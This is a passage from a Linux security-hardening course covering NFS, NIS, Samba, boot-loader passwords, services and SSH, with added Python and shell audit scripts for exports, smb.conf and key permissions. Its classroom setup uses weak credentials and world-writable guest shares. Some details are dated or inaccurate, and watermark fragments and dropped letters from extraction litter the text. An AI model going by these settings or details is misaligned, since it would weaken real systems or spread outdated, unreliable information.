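        bit = stat.S_IRUSR if want == "r" else stat.S_IWUSR
    else:
        bit = stat.S_IROTH if want == "r" else stat.S_IWOTH
    return bool(mode & bit)


# Constructed file: created on the server by User1 (UID 1234), mode 0600.
SECRET_OWNER = 1234
SECRET_MODE = 0o600


def uid_collision():
    """User2 on another allowed host also has UID 1234: the server cannot
    tell the two apart, so User2 reads User1's private file."""
    return permitted(1234, {"rw"}, SECRET_OWNER, SECRET_MODE, "r")


def remote_root(export_opts):
    """What root on an allowed client gets, with and without no_root_squash."""
    return permitted(0, export_opts, SECRET_OWNER, SECRET_MODE, "r")


if __name__ == "__main__":
    print("UID 1234 from another host reads the 0600 file:", uid_collision())
    print("remote root, root_squash (default):", remote_root({"rw"}))
    print("remote root, no_root_squash:", remote_root({"rw", "no_root_squash"}))
```

The model makes the design point plain: root_squash protects only against the remote root account itself, not against a remote root who becomes UID 1234 locally, which is why restricting the client list and keeping UIDs consistent across hosts (or using NIS, covered next) matters as much as the export options.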

The primary service to secure for NFS is the portmap service. To start, be sure that portmap is protected by TCP wrappers, as per your design. It is recommended that the portmap service be provided only to those who specifically need it. If only a small section of your internal network needs to use NFS, then your portmap-specific TCP wrappers files will look something like this:

/etc/hosts.allow
portmap: 172.16.23.0/16

/etc/hosts.deny
portmap: ALL

The hosts_access(5) manual page documents the network/mask form (for example 172.16.23.0/255.255.255.0 for a single /24); check whether your version accepts the prefix-length form shown above, and make sure the mask really matches the "small section" you intend, because a /16 covers all of 172.16.0.0 through 172.16.255.255. Also remember that hosts.deny only applies to what hosts.allow did not match, and that wrapping portmap does not by itself protect rpc.nfsd: nfsd listens on the well-known port 2049, so a client that skips portmap can still talk to it, and the packet filter should restrict that port as well.

Even though it may seem straightforward, another issue to watch out for is making mistakes in typing in what you want to be exported. A simple syntax error can export volumes that you did not want exported. Consider the ramifications of the following two lines, where there are slight differences:

/temp/db23/ 192.168.10.0/24(rw)
/temp/db23/ 192.168.10.0/24 (rw)

The difference is so minor you might not even see it at first. Note that in the first line, there is no space between the network address and the permissions, but in the second line there is a space. This space makes all the difference. With the space, as in the second example, 192.168.10.0/24 is exported with the default options (read-only) and the (rw) is applied to everyone, even though an address is defined, so the directory is exported read-write to the world.

Another issue with NFS is that if you export a directory, you are exporting the subdirectories in that main directory. From a security perspective, this can cause obvious issues; in this case, the unique permissions that apply to the lines in /etc/exports. In this example, you want to provide access to the 192.168.10.0/24 network for the main exported directory, /scnp. However, you do not want the 192.168.10.0/24 network to have access to the /scnp/results directory.

/scnp 192.168.10.0/24(ro)
/scnp/results 192.168.10.0/24(noaccess)

Be aware that noaccess is an export option of some other UNIX NFS servers, not of Linux nfs-utils, where exportfs rejects it as an unknown option; and a client that has mounted /scnp can still reach /scnp/results through the parent export as long as both are on the same file system. On Linux, the reliable ways to keep /scnp/results out of an export are to place it on a separate file system (an export does not cross into a file system mounted beneath it unless nohide or crossmnt is set) or to move it outside the exported tree altogether.

After you create your NFS shares, regardless of how you create them, be sure that you verify the exporting is as desired. This can be done quickly from a Terminal Window by using the command showmount -e <hostname>.
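The space mistake and the noaccess line above are both things an automated check can catch before exportfs ever reads the file. The following Python linter is an added example, not code from the course book; it parses /etc/exports lines the way the syntax section describes them (client(options), with a bare (options) applying to every host), reports unknown options, no_root_squash and world exports, and warns about subdirectories exported separately from their parent. The sample file is constructed from the lines shown in this topic, and the list of known options is a subset of exports(5).

```python
# Added example (not code from the course book): a linter for /etc/exports
# that catches the mistakes discussed in this topic. The option list is a
# subset of exports(5); the sample file is constructed from the book's examples.
import re

KNOWN_OPTS = {
    "ro", "rw", "sync", "async", "secure", "insecure",
    "root_squash", "no_root_squash", "all_squash", "no_all_squash",
    "subtree_check", "no_subtree_check", "wdelay", "no_wdelay",
    "hide", "nohide", "crossmnt", "no_acl", "secure_locks", "insecure_locks",
}
VALUED_OPTS = {"anonuid", "anongid", "fsid", "sec", "refer", "replicas"}

# client(opts), client alone, or a bare (opts); anything else is unparsable
TOKEN = re.compile(r"(?P<client>[^\s(]+)?(?:\((?P<opts>[^)]*)\))?")


def parse_exports(text):
    """Return [(lineno, path, [(client, opts), ...])]; opts is None for a
    token that could not be parsed, and client is '*' for a bare (opts)."""
    exports = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *tokens = line.split()
        entries = []
        for tok in tokens:
            m = TOKEN.fullmatch(tok)
            if m is None:
                entries.append((tok, None))
                continue
            client = m.group("client") or "*"
            opts = [o for o in (m.group("opts") or "").split(",") if o]
            entries.append((client, opts))
        if not entries:
            entries.append(("*", []))          # a path with no client list at all
        exports.append((lineno, path, entries))
    return exports


def lint_exports(text):
    """Return a list of (lineno, severity, message) findings."""
    findings = []
    exports = parse_exports(text)
    for lineno, path, entries in exports:
        for client, opts in entries:
            if opts is None:
                findings.append((lineno, "error", f"{path}: cannot parse token '{client}'"))
                continue
            if client == "*":
                findings.append((lineno, "error",
                                 f"{path}: options ({','.join(opts) or 'ro'}) apply to EVERY host; "
                                 "there is a space or no client before the parenthesis"))
            elif "rw" in opts and ("*" in client or "?" in client):
                findings.append((lineno, "warn", f"{path}: read-write export to wildcard client {client}"))
            for opt in opts:
                if opt.split("=", 1)[0] not in KNOWN_OPTS | VALUED_OPTS:
                    findings.append((lineno, "error",
                                     f"{path}: '{opt}' is not a Linux nfs-utils option; exportfs rejects it"))
            if "no_root_squash" in opts:
                findings.append((lineno, "warn",
                                 f"{path}: no_root_squash gives remote root full root access on the server"))
            if "insecure" in opts:
                findings.append((lineno, "warn",
                                 f"{path}: 'insecure' accepts requests from unprivileged source ports"))
    # A separately listed subdirectory is still reachable through the parent
    # export when both live on the same file system.
    paths = {p.rstrip("/") or "/" for _, p, _ in exports}
    for lineno, path, _ in exports:
        p = path.rstrip("/") or "/"
        for parent in paths:
            if parent != p and p.startswith(parent.rstrip("/") + "/"):
                findings.append((lineno, "warn",
                                 f"{p} lies under exported {parent}; clients of {parent} can still reach it"))
    return findings


# Constructed sample, built from the lines shown in this topic.
SAMPLE_EXPORTS = """\
/R&D 172.16.55.63(rw)
/Policy 172.16.55.0/255.255.255.0(ro)
/tech 192.168.20.0/24(rw,no_root_squash)
/temp/db23/ 192.168.10.0/24 (rw)
/scnp 192.168.10.0/24(ro)
/scnp/results 192.168.10.0/24(noaccess)
"""


def lint_sample():
    return lint_exports(SAMPLE_EXPORTS)


if __name__ == "__main__":
    for lineno, severity, message in lint_sample():
        print(f"line {lineno}: {severity}: {message}")
```

Against the sample, line 4 (the stray space) and line 6 (noaccess) are reported as errors and line 3 (no_root_squash) and line 6 (a subdirectory of /scnp) as warnings, which is exactly the set of problems the text walks through; point lint_exports at the real file before running exportfs -rav.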

TASK 3D-2
Verifying Export Permissions

Setup: You are logged on to Red Hat 8 as root.

1. Create four directories named /NFS_1 through /NFS_4.

2. Use the NFS Server Configuration tool to create the following exported directories:
Directory: /NFS_1 ; Host: 192.168.10.1 ; Permissions: Read-Only
Directory: /NFS_2 ; Host: 172.16.10.2 ; Permissions: Read-Only

3. Apply the changes, and close the NFS Server Configuration tool. Save changes if you are prompted to do so.

4. Navigate to the /etc/exports file, and open it in Emacs.

5. Add the following lines:

/NFS_3/ 192.168.10.1(ro,sync)
/NFS_4/ 172.16.10.2(rw,sync)

6. Save and close the file.

7. In a Terminal Window, enter exportfs -rav to enact the changes in the file that you manually added.

8. Read the response provided on the screen.

9. In the Terminal Window, enter showmount -e <hostname> to check the export permissions. If the export permissions are not displayed by using the showmount command, you can view them in the /etc/exports file or in the NFS Server Configuration Tool. (showmount -e lists the exported directories and the clients allowed to mount them, not the ro/rw options; to see the options as the server has applied them, use exportfs -v.)

10. Observe the difference in the permissions for NFS_4 versus the others you added.

11. Close all open windows.

NIS

Network Information Service (NIS) was formerly called the Yellow Pages (or simply YP), and it is unlikely that you will be running it in a production environment. There are different versions of NIS, most notably NIS and NIS+. NIS+ has increased security built into it; however, development work on NIS+ has stopped, and it is not often implemented in a production environment.

NIS Operation

In a network running NIS, there must be (at the minimum) one server running as the NIS Server. The NIS Server serves an NIS domain, which is a logical name for the grouping of computers that will use NIS together. Do not confuse this with a DNS domain name, or with a Microsoft domain. The NIS domain is unique to the function of NIS. The NIS terminology for the servers that serve the domain is Master and Slave. There is one Master NIS Server and there may be multiple Slave NIS Servers.

NIS itself uses RPC and the client/server model to allow for distributed login information (login names, passwords, and home directories from /etc/passwd) and group information (/etc/group). The effect is that you can have your password information listed in the NIS Server database, and you can log in to any machine on the network that has the NIS client running. Note that any host that knows the NIS domain name and can reach the server's RPC ports can request these maps, including the password hashes they contain, which is the main reason NIS is considered weak.

The /etc/passwd and /etc/group files are converted to DBM format by using the ASCII-to-DBM conversion program makedbm. The Master NIS Server then has both a DBM and an ASCII version of the databases. A database in DBM form is called an NIS map. For example, the NIS maps for the domain Marketing might live under /var/yp/Marketing.

Any time there is a change to the NIS maps, the Slave Servers are notified by the yppush program and synchronize their databases. NIS clients do not receive this notification; only the servers do.

As networks become more complex, and as attacks get more sophisticated, you will likely want to migrate to a more secure means of authentication across the network. That means is Kerberos. Kerberos uses secret-key cryptography to provide for secure communications. Detailed discussions of NIS and Kerberos are both beyond the scope of this course.

What is Samba?

Samba is a suite of programs that makes use of the Server Message Block (SMB) protocol. It is often used to solve the communication problems that Linux and Windows machines normally have when trying to share files. Samba makes it possible to share directories with Windows machines in a simple and straightforward manner that does not require the Windows clients to use anything other than their built-in networking utilities.

This touches on one of the problems that people had with file sharing before Samba. A Linux machine already running as an NFS server could share files with Windows machines, but the Windows client was required to run PC-NFS to gain access to the NFS shares. There were two primary problems with the NFS way of sharing files: First, there was a cost attached to the use of the third-party PC-NFS client software. Second, the client software itself would often crash and cause problems with PC applications.

crash: A sudden, usually drastic failure of a computer system.

More Uses for Samba

Even though it is beyond the scope of this course, the Samba server can do far more than just act as a means for sharing files; the Samba server can also:

Be a NetBIOS name server.
Act as a Windows NT Domain Controller.
Support ACLs on printer and file shares.
Engage in NetBIOS browsing.
Be a Master Browser for a Windows network.
Support RPC-based and LanMan printing.

But even if Samba can perform any of these, or other, roles, it is still not a Windows server, the very machine that was designed to do those tasks. So why would anyone replace a Windows machine, such as a file or print server, with a Linux machine running Samba? As usual, the bottom-line answer is often due to the bottom line. Licensing costs for Windows NT Server can rapidly add up, while Red Hat Linux with Samba support can legally be had completely free of charge, excluding the cost of your bandwidth to download and burn the CD images.

All right, you now know that Samba can help you share files on a Linux machine so that Windows clients can access them. What if you want to access a shared directory on a Windows machine from a Linux machine? Fortunately, that ability is also built into Samba with smbclient. To use smbclient to access a Windows share called marketing, on a machine called fuzzybunny, with the user account johni, you would enter the following command into a Terminal Window:

smbclient //fuzzybunny/marketing -U johni

Your request will be sent to fuzzybunny and you will be prompted for a password before being allowed to proceed. (Do not supply the password on the command line in the -U johni%password form; it would be visible in the process list and in your shell history.)

Configuring Samba

Samba's Configuration Files

Editing the files needed to configure the Samba server so that it will share directories with the rest of your network is relatively straightforward, at least for a basic implementation. The file you will be most concerned with is smb.conf, which (in a default install) should be located in the /etc/samba/ directory. In the task for configuring Samba, you will be using a very simple configuration, but there are many more options available for you to use. In broad terms, the smb.conf file is separated into two sections:

The Global Settings section has settings that apply to the overall running of the server, such as the name of the workgroup and its description, IP restrictions, guest accounts, logging, encryption use, browser control modes, WINS and DNS settings, and security modes.

The Share Definitions section defines the properties of the individual shares that are configured for the server.

To explore these options, feel free to look at the default smb.conf file before you modify it. It has numerous sample configurations with explanations that will show many more of the options available to you.

Even though the configuration you will be using in the upcoming task does not have many parameters defined, we will still step through them here. Here is the configuration you will be working with:

# global settings
workgroup = workgroup
server string = Samba Server
hosts allow = 172.16. 172.17. 172.18. 127.
security = user
local master = no
name resolve order = host bcast
encrypt passwords = yes
smb passwd file = /etc/samba/smbpasswd
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
# share definition
[public share]
comment = public samba share
path = /samba_share
browseable = yes
public = yes
writable = yes

The first part of the file contains the Global Settings, which define the following:

Workgroup: This field defines the name of the workgroup under which you want the server to appear. The default is MYGROUP, but to be part of the same workgroup that Windows uses by default, we will use workgroup.

Server string: This field will display as text under the Comment field in Network Neighborhood.

Hosts allow: This restricts access to the hosts or networks you define. Although not really important in the classroom, you should define your network and your loopback address here. For instance, if you are in the 172.16.0.0/16 network, to permit your peers and yourself to access the Samba share, your entry would look like this:

172.16. 127.

Be aware that there is a period after the 16, a single space between that period and the 127, and a period after the 127. A trailing period makes the entry a network prefix (172.16. matches every address that begins with 172.16.), and the space separates one entry from the next. Without a hosts allow line, Samba accepts connections from any host that can reach it.

Security: This sets the security mode to user level, which accepts or rejects requests based upon a user name and password. (With share-level security, the client authenticates itself separately for each share, which is weaker and should be avoided.)

Local master: This line states that the Samba server will not become the master browser in the network. If you want it to participate in the normal master browser elections, change the setting to yes (you should also define an OS level if you want it to have a chance of winning).

Name resolve order: This line tells Samba to check its /etc/hosts file for name resolution. If no entry is found, it resorts to a broadcast to resolve the name.

Encrypt passwords and smb passwd file: These entries tell Samba to use encrypted passwords (that is an oversimplification; it means Samba uses the challenge/response scheme, in which password hashes rather than passwords are used) and where the 16-byte hash values are stored for Samba users (much in the way that the shadow file stores hashed passwords for normal users). Because those hashes are password-equivalent in the challenge/response scheme, the smbpasswd file must be readable by root only.

Socket options: These options are simply for performance.

The second part of the file has the Share Definitions, which define the following:

[public share]: Sets the name for the share.

Comment: Sets the comment that clients browsing the network will see for the share.

Path: Indicates where the real shared directory can be found for the share.

Browseable: Defines whether clients will be able to find the share by browsing Network Neighborhood.

Public: Setting this to yes means that it is not a private share for restricted users; guest (unauthenticated) access is allowed.

Writable: A permission selection that defines that users are able to write to the share. Combined with public = yes, this lets anyone who can reach the server write to /samba_share, which is acceptable for this classroom exercise but not for a production file server.
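Each setting above is something that can be checked mechanically. The following Python code is an added example, not code from the course book or from the Samba project: a small smb.conf parser and an audit that flags the weak choices discussed here (share-level security, unencrypted passwords, a missing or non-private hosts allow, and a share that is both public and writable). The first sample is the book's configuration; the second is a constructed weak one for contrast, and its 203.0.113. entry is a documentation address range used only as an example of a non-private prefix.

```python
# Added example (not code from the course book or the Samba project): a
# parser and audit for the smb.conf settings explained above. It flags
# share-level security, unencrypted passwords, a missing or too-broad
# hosts allow, and shares that are both public and writable. Both sample
# configurations are constructed; the first is the book's own.
import ipaddress

PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def parse_smb_conf(text):
    """Return {section: {name: value}}; lines before any [section] go to 'global'.
    Samba ignores case and whitespace in parameter names; this parser
    lowercases them and collapses whitespace, which suffices for files
    written like the book's."""
    conf = {"global": {}}
    section = "global"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line:
            name, value = line.split("=", 1)
            conf[section][" ".join(name.lower().split())] = value.strip()
    return conf


def _yes(value):
    return value.strip().lower() in ("yes", "true", "1")


def private_prefix(entry):
    """True if a hosts allow entry such as '172.16.' or '10.0.0.0/8' lies
    entirely within private or loopback address space."""
    entry = entry.strip()
    try:
        if entry.endswith("."):              # prefix form: 172.16. means 172.16.0.0/16
            octets = entry.rstrip(".").split(".")
            padded = ".".join(octets + ["0"] * (4 - len(octets)))
            net = ipaddress.ip_network(f"{padded}/{8 * len(octets)}")
        else:
            net = ipaddress.ip_network(entry, strict=False)
    except ValueError:
        return False                         # host names cannot be verified here
    return any(net.subnet_of(p) for p in PRIVATE_NETS)


def audit_smb_conf(text):
    """Return a list of (section, message) findings."""
    conf = parse_smb_conf(text)
    g = conf["global"]
    findings = []
    if g.get("security", "user").lower() != "user":
        findings.append(("global", f"security = {g['security']}: use user-level security"))
    # Samba 2.2 defaulted encrypt passwords to no, so a missing line is treated as no.
    if not _yes(g.get("encrypt passwords", "no")):
        findings.append(("global", "encrypt passwords is not yes: passwords may cross the wire in cleartext"))
    allow = g.get("hosts allow")
    if allow is None:
        findings.append(("global", "no hosts allow: any host that can reach the server may connect"))
    else:
        for entry in allow.split():
            if not private_prefix(entry):
                findings.append(("global", f"hosts allow entry {entry} is not a private or loopback range"))
    for name, share in conf.items():
        if name == "global":
            continue
        writable = (_yes(share.get("writable", share.get("writeable", "no")))
                    or not _yes(share.get("read only", "yes")))
        public = _yes(share.get("public", share.get("guest ok", "no")))
        if public and writable:
            findings.append((name, "guest access to a writable share"))
    return findings


BOOK_CONF = """\
# global settings
workgroup = workgroup
server string = Samba Server
hosts allow = 172.16. 172.17. 172.18. 127.
security = user
local master = no
name resolve order = host bcast
encrypt passwords = yes
smb passwd file = /etc/samba/smbpasswd
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
# share definition
[public share]
comment = public samba share
path = /samba_share
browseable = yes
public = yes
writable = yes
"""

# Constructed weak configuration for contrast.
WEAK_CONF = """\
workgroup = workgroup
security = share
encrypt passwords = no
hosts allow = 172.16. 203.0.113.
[public share]
path = /samba_share
public = yes
read only = yes
"""

if __name__ == "__main__":
    for label, conf in (("book", BOOK_CONF), ("weak", WEAK_CONF)):
        for section, message in audit_smb_conf(conf):
            print(f"{label}: [{section}] {message}")
```

For the book's configuration the only finding is the public, writable share, which is the deliberate classroom choice; the weak variant produces three findings in the global section. This audit is a complement to testparm, which checks syntax but says nothing about whether the settings are safe.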

Running and Maintaining Samba

It should be obvious that before users can connect to the Samba server, there need to be user accounts for the Samba server to authenticate users against. To create these accounts specific to Samba, use the smbpasswd -a command. The user account should already exist on the Linux system. This command specifies that the user name should be added to the local smbpasswd file, using the new password given in the command. For example, to add the account administrator_bob with a password of administrator to the local /etc/samba/smbpasswd file, you would use this command:

smbpasswd -a administrator_bob administrator

Giving the password on the command line is convenient in the classroom, but on a real server it lands in the shell history and is briefly visible to every user in the process list; run smbpasswd -a administrator_bob on its own and type the password at the prompt instead.

Once changes have been made to the smb.conf file, you need to tell the machine to account for these changes and reapply the configuration. You can do this by restarting the Samba service. To stop, start, or, in one command, stop and restart the Samba service, you can use any of these commands:

/etc/rc.d/init.d/smb stop
/etc/rc.d/init.d/smb start
/etc/rc.d/init.d/smb restart

Once Samba is configured and running, any Windows client that is allowed to use Network Neighborhood (or My Network Places, as the case may be) will be able to find the Samba server, as long as the share has been marked as browseable = yes.

Figure 3-23: The Samba server shows up in My Network Places.

Double-clicking the Samba server, like any other machine in the network, will make the computer try to authenticate the incoming request before continuing. After the browsing computer has authenticated, a list of shares is presented to the user.

Figure 3-24: The Samba share as seen by administrator_bob.

TASK 3D-3
Configuring the Samba Server

Objective: For this task, we will create a simple public share that Windows clients will be able to access on our Linux server.

Setup: Students should work in pairs for this exercise. One student will use Windows 2000 Server and the other Red Hat Linux 8.0. If time permits, the task should be done twice with the Windows and Linux roles reversed, so that both students can perform the Linux install and be the Windows client.

If NetBIOS has been disabled for any reason in Windows, it should be re-enabled for this task.

Note: Perform step 1 through step 22 only if you have been designated as the Linux user.

1. On the Linux machine, from the Red Hat Main Menu, choose System Settings→Users And Groups to prepare to create a user account for the Windows user who will be connecting to the share.

2. Click the Add User button.

3. Set the User Name to administrator_bob.

4. Set the Password to administrator, and confirm the typing of the password.

5. Click OK to add the new user.

6. Close User Manager.

7. Open the Nautilus File Manager to prepare to create the folder that will be used for the public share. Under Location, change /root to /, and press Enter. In the open space displaying the directories under /, right-click and choose New Folder. Name the folder samba_share.

8. Right-click the new folder and choose Properties.

9. On the Permissions tab, change the permissions so that owner, group, and others all have read, write, and execute permissions. Observe how the text and numerical views change as you check or uncheck the boxes. This might help you better understand the relationship between the types of permissions displays. Click Close. (Mode 777 is fine for this classroom share; on a production server, grant write access through group ownership rather than to others.)

10. Navigate to and open the /etc/samba directory.

11. Right-click the smb.conf file and choose Copy File. Paste the copy into the same folder by deselecting the file, right-clicking in the open space of the folder, and choosing Paste File.

12. Right-click the copy and choose Properties. Change the name of the file to smb.conf.bak. Although it's not strictly necessary in this case, it is usually a very good idea to make a backup of a working configuration file before you make any changes to it.

13. After your backup has been made, right-click the smb.conf file and open it in Emacs.

If you like, you can use any other text editor, such as OpenOffice or jpico.

If you are using OpenOffice, when you choose to save, you will see a pop-up asking if you want to save it in the OpenOffice.org 1.0 text document format. Click No; then, when you go to close OpenOffice.org, you will be given another warning telling you that saving in external formats may have caused information loss. When you are asked if you still want to close, click Yes.

14. Take a quick look through the sample config to become familiar with some of the things you can do with Samba, then select and delete all of the text in the file.

15. Enter the following lines:

# global settings
workgroup = workgroup
server string = Samba Server
hosts allow = 172.16. 172.17. 172.18. 127.
security = user
local master = no
name resolve order = host bcast
encrypt passwords = yes
smb passwd file = /etc/samba/smbpasswd
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
# share definition
[public share]
comment = public samba share
path = /samba_share
browseable = yes
public = yes
writable = yes

16. Save your changes and close the file.

17. To test your configuration changes for syntax errors, open a Terminal Window and enter testparm. Examine the results displayed, press Enter to view the service definitions, correct any errors (typos are usually to blame), and retest before you proceed.

18. In the Terminal Window, enter smbpasswd -a administrator_bob administrator to add the user you created earlier to the list of users who can access Samba shares with an encrypted password. If you see an error message, re-enter the command.

19. In the Nautilus File Manager, find the /etc/services file, and verify that it contains the line swat 901/tcp to provide SWAT functionality. If necessary, add the line and save the file.

20. Find the /etc/xinetd.conf file, and edit it to add the following line, then save and close the file:

swat stream tcp nowait,400 root /usr/sbin/swat swat

If swat is not installed in the default location of /usr/sbin, alter the line to match the location of your swat binary.

The line above is in the classic inetd.conf format; xinetd normally reads a per-service block (typically placed in /etc/xinetd.d/swat) rather than a single line like this, so check which format your xinetd accepts. Whichever you use, restrict SWAT to your own host with only_from or TCP wrappers, because SWAT transmits the root password over plain HTTP on port 901.

21. In the Terminal Window, enter /etc/rc.d/init.d/smb start to start your Samba server. You should see two starting responses (one for smbd and one for nmbd).

22. Give your machine a few minutes to update the local network, then ask your partner to complete the rest of the task.

Note: Perform the rest of this task only if you have been designated as the Windows user.

23. At the Windows 2000 Server machine, log on as administrator, and open My Network Places.

24. Verify that you can see the Samba Server in the workgroup. This share can also be reached like any other normal share in a Windows network by using normal UNCs (\\ServerName\public share). This would be even more valuable information if the share were marked as not browseable.

If your partner's machine is unavailable, check the smb.conf file to ensure that the hosts allow line is accurate.

25. Double-click the icon for the Linux machine, and log in using the credentials your partner entered earlier in the task.

26. Reboot and log in to Linux as root.

Topic 3E

Final OS Hardening

In this topic, you will investigate several additional hardening methods, including securing the system startup and shutdown processes, logging, Tripwire, and Bastille.

System Startup/Shutdown Security

Hardening Startup and Shutdown Routines

Up to this point, all the security issues addressed were ones that required the system to be up and running, and interacting with clients and other computers. There are things you can do to affect the overall security of the machine even before the system is fully loaded and operational.

The computer's boot loader is the small program that allows the computer to load the operating system, and often presents the computer user with a small menu of OSs to load. In Linux, the boot loader is usually LILO (which stands for Linux Loader). LILO is configured at the end of the installation process, but it can be modified later for added security. Figure 3-25 shows an example LILO file that has not been altered since the install of the OS.

Figure 3-25: A Linux lilo.conf file.

The primary item to add to the LILO file is a password. An example of the syntax is simply password=L1L0_p@s5. Without a password, anyone at the console can pass boot parameters at the LILO prompt (booting into single-user mode, for instance) and obtain a root shell without authenticating; adding the restricted keyword alongside password= requires the password only when such parameters are supplied, which keeps unattended reboots possible. The LILO file is not encrypted, and the password will be stored in cleartext in /etc/lilo.conf. This means that you will need to secure the file (chmod 600) so that users other than the root account cannot read it, and you must rerun /sbin/lilo after editing it, because the boot loader reads the configuration only when it is installed. It is also suggested that you implement a password on the computer's BIOS and, if the option exists, disable booting from the floppy disk drive or other removable media, since a boot loader password protects nothing if an attacker can boot their own media.

The opposite end of the spectrum is the process of shutting down the system. Linux has a specific sequence of events that happens during the shutdown process. The general process of bringing down a Linux system by using the shutdown command is detailed in the following four steps:

1. Notifies other processes and user accounts that the shutdown is imminent.
2. Shuts down the other processes that are still running.
3. Notifies root of the services that are shut down.
4. Reboots the system (if specified).

Shutting down the system properly, not just hitting the power switch, and letting the system complete the shutdown process is important. A system that is not shut down properly might not unmount partitions, leading to file system corruption.

The shutdown command can be run only by the root account. The program is located at /sbin/shutdown, and has two common switches. Using the -r option reboots the system, and using the -h option halts the system. (Halt means that the system is stopped; on hardware with power management support it is also powered down.)

Removing Services

One of the fundamental steps in hardening any OS is to remove, or disable, services and unwanted aspects of the OS that are not going to be used, without affecting the OSs functionality. From the Terminal Window, you can kill the services one at a time, as you wish.

ru ct

or
NO DO

AT
Removing Services
Remember, to nd Process IDs for running services, use the ps command.

Consider changing the permissions on the shutdown command. If the majority of the users of the system were connecting remotely, you would likely want that command to be available only to the root account. If they are local users, you might decide to have the command available to everyone.

In

Another great tool for disabling services is the Service Conguration tool. This tool allows for the quick visual check of running services, and enables you to use check boxes to start and stop services, without having to resort to using the command syntax. Figure 3-26 shows the Service Conguration tool.

st

You can use the kill utility to end a service. When executed, the kill utility sends a signal to the service, which is identied by the PID. If no signal is specied in the syntax of the command, a TERM (terminate) signal is sent. The initial syntax is simply kill <PID>. If you need to restart the service after it has been killed (if you have made changes to it, for example), just add the -HUP switch, for a command syntax of kill -HUP <PID>.

Lesson 3: Hardening Linux Computers

E
211

iti

on

Ed
T DU

Figure 3-26: The Service Conguration tool in Red Hat Linux.

A great feature of this tool, as you can see from the image, is that there is a short description of each service. For example, the highlighted service could probably be turned off on a desktop computer. This is helpful for the services you are not sure about. If you are still unsure, even after reading the short description, you must do more research before changing your system. Turning off the wrong service can have drastic consequences, so you should attempt to do so only if you are certain of the results.

TASK 3E-1
Stopping Unneeded Services

Setup: You are logged in to Linux as root.

1. In a Terminal Window, enter serviceconf to start the Service Configuration tool.
2. Scroll through the list, and examine the processes that you can stop, such as apmd.
3. Stop the apmd service, click Save, and quit the Service Configuration tool.

Linux Run Levels

In the Service Configuration tool, you might have noticed a Runlevel indicator. The run levels of Linux are the basic modes of operation. An analogy for Windows users is running in Safe Mode, because that is a different mode of operation for the OS. Linux has six different run levels:

0: Halt the System
1: Single-user Mode
2: Multi-user Mode (without NFS)
3: Multi-user Mode
5: Multi-user Mode, with a Graphical Login
6: Reboot the System

For most systems, the default is to use a run level of 5. If you want to have the system load into a text-mode login, then use run level 3. Levels 1 and 2 are rarely used.

A program called init is responsible for starting and stopping processes based on the run level. You can manually enter a runlevel command. For example, to shut down and halt the system you can use the telinit 0 command; to shut down and reboot the system, you can use telinit 6.

SSH

Even though you use telnet often in this class, and perhaps in the office, the behavior of telnet is not secure enough for organizations that require high levels of security. The reason that telnet is not considered to be secure enough is that the authentication of telnet is carried out in cleartext. Anyone sniffing the segment can learn the user name and password for telnet authentication.

The replacement for telnet is SSH, or Secure Shell. SSH creates a secure connection between the client and the server, where the client initiates all communication. There are several benefits to the security of the network from using SSH, including:

1. Authentication is encrypted, so the user name and password are never transmitted in cleartext.
2. After a session is established, the client verifies that the server is still the same host that the client started the session with.
3. Data transferred between client and server is encrypted using 128-bit encryption.

secure shell: A completely encrypted shell connection between two machines protected by a super long pass-phrase.

In Red Hat Linux 8.0, a version of SSH called OpenSSH is included. This includes the OpenSSH Server (openssh-server) and the OpenSSH Client (openssh-clients) packages. OpenSSH also requires the OpenSSL package for the cryptographic component, which is included. The OpenSSH daemon uses the configuration file /etc/ssh/sshd_config. To configure an OpenSSH Server, you can enable the OpenSSH service by using the /sbin/service sshd start command.

The server will generate RSA keys for use with SSH. The RSA keys are found in the /etc/ssh directory. Key files whose names end with a .pub extension are public keys, and should be readable by everyone. Key files whose names end with _key are private keys, and should be readable only by root. Once the command finishes running, you are ready to accept clients using SSH.
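The two file-permission rules stated in this topic, that a LILO configuration carrying a cleartext password= line must be readable by root alone, and that the *_key files in /etc/ssh are private while the .pub files may be world-readable, can be checked with a short script. The following is an added example, not code from the course or from OpenSSH or LILO; the directory, file and owner arguments are assumptions so that the check can be run against a constructed copy rather than the live /etc/lilo.conf and /etc/ssh:

```shell
#!/bin/sh
# Added example (not course or project code): audit the permissions of
# two kinds of sensitive file discussed in this topic.
#   - a LILO configuration that carries a cleartext password= line
#   - the OpenSSH host key files in /etc/ssh (*_key private, *.pub public)
# Paths and the expected owner are parameters (an assumption) so the
# check can run against a constructed copy; on a real host pass
# /etc/lilo.conf, /etc/ssh and root.

# Octal mode and owner name of a file (GNU stat, with a BSD fallback).
file_mode()  { stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"; }
file_owner() { stat -c '%U' "$1" 2>/dev/null || stat -f '%Su' "$1"; }

# True when the group or other permission digits are anything but 0,
# i.e. someone besides the owner can read or write the file.
shared_beyond_owner() {
  mode=$(file_mode "$1")
  last2=${mode#"${mode%??}"}      # last two octal digits: group, other
  [ "$last2" != "00" ]
}

# Print one "FAIL <file>: <reason>" line per problem with a file that
# must be private to $2; return 0 only if there were none.
check_private_file() {   # $1 = file, $2 = expected owner, $3 = label
  bad=0
  if [ "$(file_owner "$1")" != "$2" ]; then
    echo "FAIL $1: $3 is owned by $(file_owner "$1"), expected $2"
    bad=1
  fi
  if shared_beyond_owner "$1"; then
    echo "FAIL $1: $3 has mode $(file_mode "$1"), expected 600 or stricter"
    bad=1
  fi
  return $bad
}

# The LILO password is stored in cleartext, so if a password= line is
# present the file itself must be readable by the owner (root) alone.
audit_lilo_conf() {      # $1 = path to lilo.conf, $2 = expected owner
  if grep -q '^[[:space:]]*password=' "$1"; then
    check_private_file "$1" "$2" "lilo.conf with password="
  else
    echo "OK   $1: no password= line (consider adding one)"
  fi
}

# Private keys (*_key) must be private to $2; public keys (*.pub) are
# meant to be readable, so they only need to exist and be readable.
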